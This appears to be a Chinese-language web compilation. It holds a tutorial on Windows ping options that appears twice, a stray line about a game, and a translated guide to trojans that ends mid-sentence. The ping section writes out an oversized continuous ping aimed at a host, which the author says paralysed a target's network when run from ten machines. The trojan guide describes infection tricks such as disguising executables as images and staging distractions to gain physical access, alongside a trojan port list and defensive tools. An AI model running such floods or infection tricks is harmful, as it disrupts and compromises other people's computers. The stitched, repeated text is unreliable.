在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）

C:＼ping -l 65500 -t 192.168.1.21

Pinging 192.168.1.21 with 65500 bytes of data:

Reply from 192.168.1.21: bytes=65500 time10ms TTL=254

Reply from 192.168.1.21: bytes=65500 time10ms TTL=254

………………

这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。

-f Set Dont Fragment flag in packet.

在数据包中发送“不要分段”标志。

在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。

-i TTL Time To Live.

指定TTL值在对方的系统里停留的时间。

此参数同样是帮助你检查网络运转情况的。

-v TOS Type Of Service.

将“服务类型”字段设置为 tos 指定的值。

-r count Record route for count hops.

在“记录路由”字段中记录传出和返回数据包的路由。

在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例：

C:＼ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由）

Pinging 202.96.105.101 with 32 bytes of data:

Reply from 202.96.105.101: bytes=32 time=10ms TTL=249

Route: 202.107.208.187 -

202.107.210.214 -

61.153.112.70 -

61.153.112.89 -

202.96.105.149 -

202.96.105.97 -

202.96.105.101 -

202.96.105.150 -

61.153.112.90

Ping statistics for 202.96.105.101:

Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 10ms, Maximum = 10ms, Average = 10ms

从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。

-s count Timestamp for count hops.

指定 count 指定的跃点数的时间戳。

此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。

-j host-list Loose source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.

指定超时间隔，单位为毫秒。

此参数没有什么其他技巧。

ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现：

[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters]

"DefaultTTL"=dword:000000ff

255---FF

128---80

64----40

32----20

好了，ping命令也基本上完全讲解完了，其中还有-j,-k参数我还没有详细说明，由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍，请大家见谅，如果在看了这篇文章的朋友当中有知道得比我更多的，以及其他使用技巧的也希望您能告诉我，并在此先谢过。

对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。

现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用：

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主机，直到你按下Control-C。

此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。

-a Resolve addresses to hostnames.

解析计算机NetBios名。

示例：C:＼ping -a 192.168.1.21

Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Ping statistics for 192.168.1.21:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

-n count Number of echo requests to send.

发送count指定的Echo数据包数。

在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知：

C:＼ping -n 50 202.103.96.68

Pinging 202.103.96.68 with 32 bytes of data:

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Request timed out.

………………

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Ping statistics for 202.103.96.68:

Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

Minimum = 40ms, Maximum = 51ms, Average = 46ms

从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。

-l size Send buffer size.

定义echo数据包大小。

在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负）

C:＼ping -l 65500 -t 192.168.1.21

Pinging 192.168.1.21 with 65500 bytes of data:

Reply from 192.168.1.21: bytes=65500 time10ms TTL=254

Reply from 192.168.1.21: bytes=65500 time10ms TTL=254

………………

这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。

-f Set Dont Fragment flag in packet.

在数据包中发送“不要分段”标志。

在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。

-i TTL Time To Live.

指定TTL值在对方的系统里停留的时间。

此参数同样是帮助你检查网络运转情况的。

-v TOS Type Of Service.

将“服务类型”字段设置为 tos 指定的值。

-r count Record route for count hops.

在“记录路由”字段中记录传出和返回数据包的路由。

在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例：

C:＼ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由）

Pinging 202.96.105.101 with 32 bytes of data:

Reply from 202.96.105.101: bytes=32 time=10ms TTL=249

Route: 202.107.208.187 -

202.107.210.214 -

61.153.112.70 -

61.153.112.89 -

202.96.105.149 -

202.96.105.97 -

202.96.105.101 -

202.96.105.150 -

61.153.112.90

Ping statistics for 202.96.105.101:

Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 10ms, Maximum = 10ms, Average = 10ms

从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。

-s count Timestamp for count hops.

指定 count 指定的跃点数的时间戳。

此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。

-j host-list Loose source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。

-k host-list Strict source route along host-list.

利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。

-w timeout Timeout in milliseconds to wait for each reply.

指定超时间隔，单位为毫秒。

此参数没有什么其他技巧。

ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现：

[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters]

"DefaultTTL"=dword:000000ff

255---FF

128---80

64----40

32----20

好了，ping命令也基本上完全讲解完了，其中还有-j,-k参数我还没有详细说明，由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍，请大家见谅，如果在看了这篇文章的朋友当中有知道得比我更多的，以及其他使用技巧的也希望您能告诉我，并在此先谢过。

hacknet游戏输入probc后出现 no command怎么玩

这个病毒的表现为无论你上什么网页瑞星监控一直提醒C:\Documents and Settings\“用户名”\Local Settings\Temporary Internet Files\Content.IE5下某些文件夹有病毒,病毒名称为MyTest2[n].jpg并且无法删除!还会造成网页显示不正常! 解决方法:清空。

*********************************************

下面的这个文章是我在《黑客技术大宝库》中看到的，作者把木马（病毒）说明得很详细，我相信你看了之后会知道不少东西的。

木马指南

1.这篇文章关于什么？

在这篇文章里，我将向你解释木马及其未来的一些令人感兴趣的事情.我希望你能认识到木马是危险的，

它仍是一个很大的安全问题.尽管许多人说不从网络上下载文件你将不会感染木马，这是不正确的.我在这儿

想解释的是木马有将来及其一些令人感兴趣的事.这篇文章只是为基于WINDOWS平台而非UNIX的木马准备.

2.木马是什么？

包含在合法程序里的未授权的程序.该未授权的程序执行用户未知（很可能不想）的功能.

一个合法的但是已经被改动的程序，在它里面包含有未授权的代码，这段代码执行用户未知（很可能不想的功能.

任何看起来执行想要和必须的功能（因为里面的未授权代码对用户是未知的）而实际执行一些用户未知

（很可能不想）的功能.

TROJANS也能叫做RAT's或远程管理工具（Remote Administration Tools），TROJAN的名字来自古老的神话故事：

希腊人在战争中如何给他们的敌人一个很大的木马做为礼物，他们接受了这个礼物，把木马带进了他们的王国，

在晚上，希腊士兵冲出了木马，向城市发动了进攻，完全征服了它.

3.木马的今天

特洛伊木马一直是一个大的安全问题，即使在如今也是.绝大多数人不知道木马为何物，他们不停从可疑

的人或不可信的地方下载文件.如今在网上有多于600种我所知的木马，我想实际会比这多的多，因为如今的每一

个黑客和程序员都有自己的为了他（她）特定需要没在任何地方公布的木马.每个黑客小组都有他们自己的木马

和程序.当有人开始学WINSOCK编程的时候，最先生成的通常是聊天客户端软件和木马.即使有反病毒扫描器（我

将在下面谈到），人们仍旧会被感染，被自己，被某些黑客，或被一些朋友.

4.木马的将来

我想有许多人们认为木马已经过时，没有前途，我不这样认为.木马将总是有前途，新东西会加到里面，在

木马中有如此多的东西可以被有技巧的程序员改善.

有新的选项和更好的加密方法的木马每天都在由程序员制造，以致防木马软件不能检测到它们.因此，没有

人知道在网上有多少木马.但是程序员仍在编制木马，他们在将来也会继续.从技术上来说，木马几乎可以在任何

地方任何操作系统或硬件平台上出现，然而在前面提到的室内工作除外.木马的广泛传播很象病毒，来自因特网

的软件下载，尤其是共享和免费软件，总是可疑的，类似地，来自地下组织服务器或用户新闻组的材料也在侯选

之列.有成千上万的软件没有检查来源，新程序特别是免费软件每天都在出现，他们可能都是木马.因此，留心你

正在下载什么，正从哪儿下载，总是从正式的页面下载软件.

5.防病毒扫描器

人们认为，当他们有了有最新的病毒定义的防病毒扫描器之后，他们在网上就是安全的，他们将不会感染

木马或没有人可以访问.

他们的计算机.这种观点是不正确的.防病毒扫描器的目的是检测病毒而不是木马.但是当木马流行的时候，

这些扫描器也开始加一些木马的定义，他们不能发现木马并分析他们，这就是他们为什么只能检测常用和广为

人知的木马比如BO和NETBUS或少数几个其他的.正如我说的，木马有大约600种，而这些扫描器只能检测他们中

极少的一部分.这些扫描器不是可以阻止试图连接你的电脑或试图攻击你（正如人们认为他们那样）的防火墙.

因此，我希望你明白这些扫描器的主要目的不是当你上线的时候检测木马并保护你.绝大多数的因特网用户只知

道BO和NETBUS是特洛伊木马，有一些特定的工具只能清除这些木马，人们就认为他们是安全的能受保

护不感染每一个木马.

6.我怎么会感染木马？

每个人都问这个问题，人们经常问他们自己怎么会感染上木马，也有一些人问的时候，他们确实运行了

某些由别人发送或从某个地方下载的文件，人们总是说他们不会运行任何东西或下载某些文件，但是他们做了.

人们总是在上线的时候不注意一些事情,这就是为什么他们会忘记他们感染木马是在什么时候.

你会在任何地方受感染，在这里我会试图解释这些事情：

---从ICQ

---从IRC

---从附件

---从物理访问

---从诡计

6.1 从ICQ

人们认为当他们正用ICQ交谈的时候不会感染，然而，他们忘记了某人给他们发送文件的时刻.每个人都知

道ICQ有多不安全，这就是为什么那么多人害怕使用它.正如你所知道的，ICQ有一个BUG让你可以发送EXE文件

给某人，但是文件看起来是BMP或JPG或不管你想让它看起来象什么的东西.这是非常危险的，正如你明白的，

你会陷入麻烦.攻击者将只是把文件的图标改成象一个BMP图象，告诉你它是他的相片，将它重命名为photo.bmp，

接着你会得到它，当然，在得到它之前你会看到bmp图象，此时你是安全的，因为它还没有被执行，接着你运行

它看照片，你认为没有什么可担心的，其实有.

那是为什么绝大多数人说他们不运行任何文件，因为他们知道他们运行了一个图片而不是可执行文件.一

个防止这个ICQ里的BUG的方法是在运行之前总是检查文件的类型，它可能有一个BMP的图标但是如果文件类

型写着可执行，我想你知道如果你运行它的话将是一个错误.

6.2 从IRC

你也可能从IRC上通过接收不可信来源文件而感染木马.我建议你应该总是paranoid，不接收来自任何人

甚至是你的最好的朋友的文件，因为有人可能偷取了他（她）的密码而来感染你.当有人问某人某些事如一个

秘密或别的只有他（她）知道的事时，他（她）认为他（她）可以100%的确信问的那个人是他（她）的朋友，

正如我告诉你paranoid，因为有人可以感染你的朋友并检查他（她）的IRC日志，看秘密是什么或了解其他的

事情.正如我所说，paranoid是更安全的，不要接受任何来自在IRC上的任何人的文件或其他地方如EMAIL，

ICQ，甚至你的在线朋友.

6.3 从附件

同样的事情也会伴随EMAIL附件发生.不要运行任何东西即使它说你将会看到热辣的色情作品或一些服

务器的密码或别的什么东西.用木马感染某人最好的方法是向服务器投递大量的EMAIL，因为在网上有很多新

手，他们当然会受感染.这是最好的感染办法--如我所说：为什么它是想感染大众的人的首选方法.

6.4 物理访问

当你的”朋友“可以物理访问你的计算机的时候，你当然会被感染.让我们假定你丢下某人在你

的电脑旁5分钟，那么你当然会被你的"朋友“中的某人感染.有一些非常精明的人，时刻想着物理访问某人

的电脑的新方法，下面是一些有趣的诡计：

1.你的”朋友“可能请你”嗨兄弟，能给我一点水吗？“或其他的可以让他单独呆着的事情，你会去取

点水，接着..你知道会发生什么.

2.攻击者可能有一个计划.比方你邀请他（她）12：00在你的家里，他会叫你的一个”朋友“在12：15给

你打电话和你谈一些事情，攻击者又有时间感染你了.也可以是：给你打电话的”朋友“说一些如”有人

在你身边吗？如果有的话，不如移到其他地方，我不想让任何人听到我们的谈话“，这样，攻击者又单独

呆着有时间感染你了.

6.5 诡计

这是一个对真想要些什么的人起作用的诡计，当然攻击者知道它是什么.比方说受害人想看色情作品

或***密码，那么，攻击者会在受害人屋子前留下一个含有木马的软磁盘，当然会将木马和XXX图片放在

一起.这是一个坏事情，因为有时候你真的想要某些东西，并且最后发现了它.

7.木马会有多危险？

许多不知道木马是什么的人认为当他们运行一个可执行文件的时候什么都没有发生，因为他们的电脑仍

旧还在工作，所有的数据都还在.如果上病毒的话，他们的数据将被毁坏，电脑将不再工作.

有人正在你的电脑上上传和下载文件；有人正读你所的IRC日志，了解你和你朋友的有趣的事情；有人

正读你的所有的ICQ消息；有人正删除你电脑上的文件....

这是一些显示木马有多危险的例子.人们只是在被感染的机器上用木马代替如CIH一样的病毒，然后毁坏机器.

8.不同种类的木马

--远程控制型木马：

这是现在最流行的木马.每个人都想有这样的木马，因为他们想访问受害人的硬盘.RAT'S (remote access

trojans)使用起来非常简单，只需要某人运行服务器，你得到受害人的IP，你对他或她的计算机有完全的访问

权.你能做一些事情，它依赖于你使用的木马.但是，RAT'S有通常的远程控制木马的功能如：KERLOGGER，上传

和下载，MAKE A SCREEN SHOT等等.有人将木马用于恶意的目的，他们只是想删除又删除....

这是LAME.但是我有一个关于使用木马最好方法的指南，你应该读它.有很多用于检测最常用木马的程序，

但是新木马每天都出现，这些程序不是最好的防御.木马总是做同样的事情.如果每次WINDOWS重新启动的时候，

木马重启，这意味着它放了什么东西在注册表或WIN.INI或其他的系统文件里，因此它能重启.木马也可能在

WINDOWS系统目录里生成一些文件，这些文件总是看起来象一些受害人认为是正常的WINDOWS可执行文件.绝大

多数木马隐瞒任务表Most trojans hide from the Alt+Ctrl+Del menu，有人只用ALT+CTRL+DEL来看哪些进

程正在运行，这是不好的.有程序会正确地告诉你进程和文件来自哪儿，但是有一些木马（正如我跟你所说）

使用伪造的名字，对有些人来说，要决定哪个进程应该杀死是有一点困难的.

远程控制木马打开一个端口让每一个人都可以连上你的电脑.有些木马有些选项象改变端口和设置密码以

使只有那个感染你的家伙可以使用你的电脑.改变端口选项是非常好的，因为我确信你不想让你的受害人看见

他的电脑上的端口31377是开着的.远程控制木马每天都在出现，而且将继续出现对那些使用这样的木马的人：

小心感染你自己，那么那些你想毁灭的受害人将会报复，你将会感到难过.

--发送密码型木马：

这些木马的目的是得到所有缓存的密码然后将他们送到特定的EMAIL地址，不不让受害者知道 e-mail.绝大

多数这种木马在WINDOWS每次加载的时候不重启，他们使用端口25发送邮件.也有一些木马发送其他的信息如

ICQ，计算机信息等等.如果你有任何密码缓存在你电脑的任何地方，这些木马对你是危险的.

--Keyloggers：

这些木马是非常简单的，他们做的唯一的事情就是记录受害人在键盘上的敲击，然后在日志文件中检查

密码.在大多数情况下，这些木马在WINDOWS每次加载的时候重启，他们有象在线和下线的选项，当用在线选

项的时候，他们知道受害人在线，会记录每一件事情.然而，当用下线选项的时候，WINDOWS开始后被写下的

每一件事情会被记录并保存在受害人的硬盘等待传送.

--破坏型木马：

这种木马的唯一功能是毁坏和删除文件，使得他们非常简单易用.他们能自动删除你计算机上所有的DLL，

EXE，INI文件.这是非常危险的木马，一旦你被感染，毫无疑问，如果你没有清除，你的计算机信息将不再存在.

--FTP型木马：

这种木马在你的电脑上打开端口21，让任何有FTP客户软件的人都可以不用密码连上你的电脑并自由上传和

下载.这些是最常用的木马，他们都是危险的，你应该小心使用他们.

9.谁会感染你？

基本上，你会被每个知道会如何使用木马（这非常简单）当然知道怎么感染你的人感染.使用木马的人是仅

仅停留在使用木马阶段的黑客，他们中的一些人不会走到下一个阶段，他们是只能使用木马（正如我所说这非

常简单）的LAMERS，但是，读了这篇文章后，你将知道别人用木马感染你的最常用方法，它将使那些想用木马

感染你的人感到困难.

10.攻击者要找什么？

你们中的一些人可能认为木马只用来搞破坏，他们也能用来刺探某人的机器，从里面取走很多私人信息.

攻击者取的信息将包括但不限于下列常用数据：

----信用卡信息

----信贷信息

----常用帐号信息

----任何帐号数据

----数据库

----邮件列表

----私人地址

----EMAIL地址

----帐号密码

----个人简历

----EMAIL信息

----计算机帐号或服务订阅信息

----你或你的配偶的姓名

----子女的姓名年龄

----你们的地址

----你们的电话号码

----你写给别人的信

----你家庭的照片

----学校作业

----任何学校的帐号信息

11.木马如何工作？

在这儿我会向你解释木马是如何工作的，如果你有些单词不了解，你可以查阅“文章中常用术语”部分.

当受害人运行木马服务器的时候，它确实在做些什么，如打开某个特定端口监听连接，它可以使用TCP或UDP

协议.当你连上受害人的IP地址时，你可以做你想做的事，因为你放了木马的计算机上的服务器让你这么做.

一些木马每次在WINDOWS被加载的时候重启，他们修改WIN.INI或SYSTEM.INI，因此他们可以重启，但是大多

数新木马使用注册表完成相应功能.木马象客户和服务器一样相互通信，受害人运行服务器，攻击者使用客户

向服务器发送命令，服务器只是按客户说的去做.

12.最常用木马端口

这儿有最常用的木马端口列表：

Satanz Backdoor|666

Silencer|1001

Shivka-Burka|1600

SpySender|1807

Shockrave|1981

WebEx|1001

Doly Trojan|1011

Psyber Stream Server|1170

Ultors Trojan|1234

VooDoo Doll|1245

FTP99CMP|1492

BackDoor|1999

Trojan Cow|2001

Ripper|2023

Bugs|2115

Deep Throat|2140

The Invasor|2140

Phineas Phucker|2801

Masters Paradise|30129

Portal of Doom|3700

WinCrash|4092

ICQTrojan|4590

Sockets de Troie|5000

Sockets de Troie 1.x|5001

Firehotcker|5321

Blade Runner|5400

Blade Runner 1.x|5401

Blade Runner 2.x|5402

Robo-Hack|5569

DeepThroat|6670

DeepThroat|6771

GateCrasher|6969

Priority|6969

Remote Grab|7000

NetMonitor|7300

NetMonitor 1.x|7301

NetMonitor 2.x|7306

NetMonitor 3.x|7307

NetMonitor 4.x|7308

ICKiller|7789

Portal of Doom|9872

Portal of Doom 1.x|9873

Portal of Doom 2.x|9874

Portal of Doom 3.x|9875

Portal of Doom 4.x|10067

Portal of Doom 5.x|10167

iNi-Killer|9989

Senna Spy|11000

Progenic trojan|11223

Hack?99 KeyLogger|12223

GabanBus|1245

NetBus|1245

Whack-a-mole|12361

Whack-a-mole 1.x|12362

Priority|16969

Millennium|20001

NetBus 2 Pro|20034

GirlFriend|21544

Prosiak|22222

Prosiak|33333

Evil FTP|23456

Ugly FTP|23456

Delta|26274

Back Orifice|31337

Back Orifice|31338

DeepBO|31338

NetSpy DK|31339

BOWhack|31666

BigGluck|34324

The Spy|40412

Masters Paradise|40421

Masters Paradise 1.x|40422

Masters Paradise 2.x|40423

Masters Paradise 3.x|40426

Sockets de Troie|50505

Fore|50766

Remote Windows Shutdown|53001

Telecommando|61466

Devil|65000

The tHing|6400

NetBus 1.x|12346

NetBus Pro 20034

SubSeven|1243

NetSphere|30100

Silencer |1001

Millenium |20000

Devil 1.03 |65000

NetMonitor| 7306

Streaming Audio Trojan| 1170

Socket23 |30303

Gatecrasher |6969

Telecommando | 61466

Gjamer |12076

IcqTrojen| 4950

Priotrity |16969

Vodoo | 1245

Wincrash | 5742

Wincrash2| 2583

Netspy |1033

ShockRave | 1981

Stealth Spy |555

Pass Ripper |2023

Attack FTP |666

GirlFriend | 21554

Fore, Schwindler| 50766

Tiny Telnet Server| 34324

Kuang |30999

Senna Spy Trojans| 11000

WhackJob | 23456

Phase0 | 555

BladeRunner | 5400

IcqTrojan | 4950

InIkiller | 9989

PortalOfDoom | 9872

ProgenicTrojan | 11223

Prosiak 0.47 | 22222

RemoteWindowsShutdown | 53001

RoboHack |5569

Silencer | 1001

Striker | 2565

TheSpy | 40412

TrojanCow | 2001

UglyFtp | 23456

WebEx |1001

Backdoor | 1999

Phineas | 2801

Psyber Streaming Server | 1509

Indoctrination | 6939

Hackers Paradise | 456

Doly Trojan | 1011

FTP99CMP | 1492

Shiva Burka | 1600

Remote Windows Shutdown | 53001

BigGluck, | 34324

NetSpy DK | 31339

Hack?99 KeyLogger | 12223

iNi-Killer | 9989

ICQKiller | 7789

Portal of Doom | 9875

Firehotcker | 5321

Master Paradise |40423

BO jammerkillahV | 121

13.不用扫描器如何监视自己的计算机？

大众认为当他们有木马和防病毒扫描器时他们就是安全的，最好的检测木马的方法是自己动手，你不能

确信木马扫描器是否正确地工作因此开始自己检测.在这篇文章里我已经包含了软件和课程评论的列表，它

们将有助于你自己检测你的机器是否有木马.你总需要检测你的系统看什么端口开着，如果你看到有一个常用

木马端口开着，你很可能已经感染了木马.

**注解**

你可以在DOS方式下使用NETSTAT或用其他的软件做这件事.

**注解**

总是注意你的电脑上有什么文件在运行，检查它里面的一些可疑的东西如它的名字.我想你会检测象

config.EXE，himem.exe，winlilo.exe或其他一些有趣的文件，Hex Edit them，如果你发现一些有趣的东西

如SchoolBus Server，立刻杀死他们.确信你在监视注册表并时刻检查它里面新的变动，确信你在监视

system.ini或win.ini，因为仍旧有很多木马从它们重启.正如我告诉你的下载一些广为人知的程序如ICQ或

MIRC总要从其官方主页下载.遵循这些简单的规则将有助于防止你的电脑感染上木马.

14.帮助你监视自己的电脑的软件

正如我告诉你的我已经包含了可以帮助你监视自己的计算机防止木马感染的软件的列表.

++++++++++++++++

----LogMonitor+

++++++++++++++++

文件和目录监视工具

Version: 1.3.4

Home page:

Author: Vadim Dumbravanu, koenigvad@yahoo.com

Log Monitor是一个文件和目录监视工具，它定期检查选定文件的修改时间，运行外部程序看是否文件已被

改变.对目录而言，它处理象文件改动，添加或删除.

平台：Windows 95/98/NT

自由供个人和商业使用，看LICENSE.TXT得到版权信息.文件包含下列主题：

--1.目的

--2.用法

--3.特性

--4.安装

--5.反安装

1.目的

程序的目的是让不同的管理员使用自动处理程序.有时候这些自动处理程序会停止工作甚至异常终止，处理

程序生成或更新错误的日志文件.Log Monitor会由他们的日志文件监视这样的处理程序，向管理员发出问题警告.

2.用法

绝大多数处理程序跟踪日志文件，定期更新他们.因此，如果这些处理程序异常终止，日志文件停止改变.如果

处理程序在选定的时段没有更新日志文件，Log Monitor会运行一个外部程序，可能是net send bla bla bla或内

存分页程序或进程重启.如果文件也被改变，Log Monitor会运行一个程序，因此你可以检查文件是否改变.Log

Monitor也可以监视目录并处理目录下的文件的变化，添加和删除.Log Monitor也被用做一个任务调度程序，如果

你想比如每个小时运行一次任务，NT Scheduler Service是不符合要求的.使用Log Monitor你可以添加根本不存在

的文件，接着选定3600秒的时间段和程序，只要文件不更新，选定的程序将每个小时运行一次.在程序被启动

之前你可以定义运行时间和日期.

3.特性

好几个文件或目录可以同时被监视，每个文件有自己的时间，由独立的线程处理.监视进程的列表存储在配

置文件里.可以最小化到System Tray，也可以恢复.

有暂停监视选定文件的能力，“暂停”状态也可以存储在配置文件里.

依调度工作，可以只在选定的每周每月的时间间隔内检查文件和目录.

其他很多很好的特性...

++++++++++++

----PrcView+

++++++++++++

PrcView是一个可以显示广泛的现运行进程信息的免费进程查看工具，这些信息包括这样的细节：生成时间，

版本，选定进程使用的DLL文件的全路径，所有线程的列表，内存块和堆.PrcView也允许你杀死或附带一个调试

器到选定的进程，PrcView既可在WINDOWS 95/98也可在WINDOWS NT平台运行，程序包括窗口和命令行两个版本.

PrcView可以以带有最初的版权条款的压缩包形式并遵循非商业原则自由免费分发.

该程序由商业组织向第三方的分发和基于该 程序的工作必须经作者允许.如果你在运行该程序的时候遇到问题请

访问以获得最新版本，如果仍有问题，请发送一个简短的描述给IgorNys@writeme.com

----XNetStat

XNetStat是一个和DOS提示符下的NETSTAT一样的程序，该程序显示你计算机上所有打开的端口和已经建立的

连接，如果你需要或有任何疑问请MAIL：fresh@arez.com

++++++++++++

----AtGuard+

++++++++++++

AtGuard是一个有很酷特性的防火墙软件.它也能显示你的计算机中的哪个文件打开了一个向外的连接，如果

你想检测电脑上的木马，这是非常有用的.我丢失了该程序的URL，但是，你可以试着在altavista.com或

packetstorm.securify.com搜索一下.

+++++++++++++++++++++++++

-----ConSeal PC FIREWALL+

+++++++++++++++++++++++++

这款软件使你的PC更安全，相比其他基于PC的防火墙，它有一些超过它们的主要优势.在Windows 95,

Windows 98 and Windows NT(3.51 4.0)上，它都可以使用.对WINDOWS机器，它可能是最好的防火墙，会

帮助你堵住你机器上的木马端口，也能抵御各种DOS攻击.

+++++++++++++++++

----LockDown2000+

+++++++++++++++++

这真是一个好的可以检测许多木马的工具包，它也作为防火墙可以保护你免受NUKE和ICQ攻击，还可以阻

止文件共享以使你不再有这方面的问题.它定期更新，加入很多新的木马定义.你想免受攻击和木马感染的话，

你必须拥有它.你可以在 处获得.

++++++++++

----TDS-2+

++++++++++

TDS（Trojan Defence Suite）也是一个有很多功能和插件的反木马工具包，它也几乎检测所有木马并定

期更新.如果你想免受攻击和木马感染，这也是必须有的一个工具.你可以在处获得.

使用所有课程中提到到反木马工具包，将会构建一个安全的反木马的WINDOWS机器.

15.在程序中设置后门

使用木马感染别人的人正变得更聪明了，他们开始将木马设在一些每个人都使用的真实程序里面，因此，

他们可以感染受害者.绝大多数人知道当他们运行一个木马程序的时候，没有什么事情发生或出错信息出现，

但是，当木马被设进其他的程序的时候，这些程序正常工作，没有任何出错信息，受害者会认为他（她）没

有被感染.这是不正确的.程序员会把两个或更多的可执行部分合成一个生成程序，因此，他们可以将木马设

在一些每个人都知道的程序里.这些开放源代码的广为人知的程序也是危险的.好的程序员可以修改源代码使

